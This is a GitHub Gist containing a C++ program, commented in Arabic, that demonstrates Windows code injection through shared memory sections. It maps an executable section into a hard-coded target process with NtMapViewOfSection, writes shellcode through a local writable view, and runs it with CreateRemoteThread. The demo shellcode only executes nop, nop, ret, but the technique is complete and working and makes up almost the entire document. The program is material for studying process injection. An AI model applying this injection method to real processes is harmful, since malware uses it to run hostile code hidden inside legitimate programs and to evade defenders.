Created
November 18, 2018 08:31
-
-
Save Barakat/1dccd8e5336c660b18eeda46b86113ce to your computer and use it in GitHub Desktop.
Code injection using shared sections
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <ntdef.h> | |
| #include <cstdint> | |
| #include <cassert> | |
| #include <cstring> | |
| #include <cstdio> | |
| typedef enum | |
| { | |
| ViewUnmap = 2 | |
| } SECTION_INHERIT; | |
| typedef | |
| NTSTATUS | |
| NTAPI | |
| (*NtMapViewOfSection_t)(HANDLE SectionHandle, | |
| HANDLE ProcessHandle, | |
| PVOID *BaseAddress, | |
| ULONG_PTR ZeroBits, | |
| SIZE_T CommitSize, | |
| PLARGE_INTEGER SectionOffset, | |
| PSIZE_T ViewSize, | |
| SECTION_INHERIT InheritDisposition, | |
| ULONG AllocationType, | |
| ULONG Win32Protect); | |
| typedef | |
| NTSTATUS | |
| NTAPI | |
| (*ZwUnmapViewOfSection_t)(HANDLE ProcessHandle, | |
| PVOID BaseAddress); | |
| int main() | |
| { | |
| // شل كود بسيط لايقوم بشيء، يتبعه نص لغرض التنقيح | |
| // nop | |
| // nop | |
| // ret | |
| // Hello world! | |
| static const uint8_t shellcode[] = "\x90\x90\xc3Hello world!"; | |
| auto ntdll = GetModuleHandleW(L"NTDLL.DLL"); | |
| auto NtMapViewOfSection = reinterpret_cast<NtMapViewOfSection_t >(GetProcAddress(ntdll, "NtMapViewOfSection")); | |
| auto ZwUnmapViewOfSection = reinterpret_cast<ZwUnmapViewOfSection_t>(GetProcAddress(ntdll, "ZwUnmapViewOfSection")); | |
| // العملية المستهدفه التي نريد حقن الشل كود بها | |
| static const DWORD target_process_id = 12776; | |
| auto current_process = GetCurrentProcess(); | |
| auto target_process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, target_process_id); | |
| assert(target_process != nullptr); | |
| // ننشئ كائن قسم مشترك | |
| auto section = CreateFileMappingW(INVALID_HANDLE_VALUE, nullptr, PAGE_EXECUTE_READWRITE, 0, 1024, nullptr); | |
| assert(section != nullptr); | |
| NTSTATUS status; | |
| // نربط الكائن في الذاكرة التخيلية للعملية المستهدفة بصلاحية القراءة والتنفيذ | |
| void *target_based_address = nullptr; | |
| SIZE_T target_view_size = 0; | |
| status = NtMapViewOfSection(section, target_process, &target_based_address, | |
| 0, 0, nullptr, &target_view_size, ViewUnmap, 0, PAGE_EXECUTE_READ); | |
| assert(NT_SUCCESS(status)); | |
| // نربط الكائن في الذاكرة التخليلة الخاصة بعمليتنا بصلاحية القراءة والكتابة | |
| void *current_based_address = nullptr; | |
| SIZE_T current_view_size = 0; | |
| status = NtMapViewOfSection(section, current_process, ¤t_based_address, | |
| 0, 0, nullptr, ¤t_view_size, ViewUnmap, 0, PAGE_READWRITE); | |
| assert(NT_SUCCESS(status)); | |
| // نكتب الشل كود في عمليتنا | |
| std::memcpy(current_based_address, shellcode, sizeof(shellcode)); | |
| // عنوان القسم في عمليتنا الحالية والعملية المستهدفة | |
| std::fprintf(stderr, "current = %p\n", current_based_address); | |
| std::fprintf(stderr, " target = %p\n", target_based_address); | |
| // نستدعي الشل كود في العملية المستهدف بإنشاء خيط معالجة فيها وننتظره | |
| auto remote_thread = CreateRemoteThread(target_process, nullptr, 0, | |
| reinterpret_cast<LPTHREAD_START_ROUTINE >(target_based_address), nullptr, 0, | |
| nullptr); | |
| WaitForSingleObject(remote_thread, INFINITE); | |
| std::getchar(); | |
| // لتنظيف | |
| ZwUnmapViewOfSection(current_process, current_based_address); | |
| ZwUnmapViewOfSection(target_process, target_based_address); | |
| CloseHandle(section); | |
| CloseHandle(target_process); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment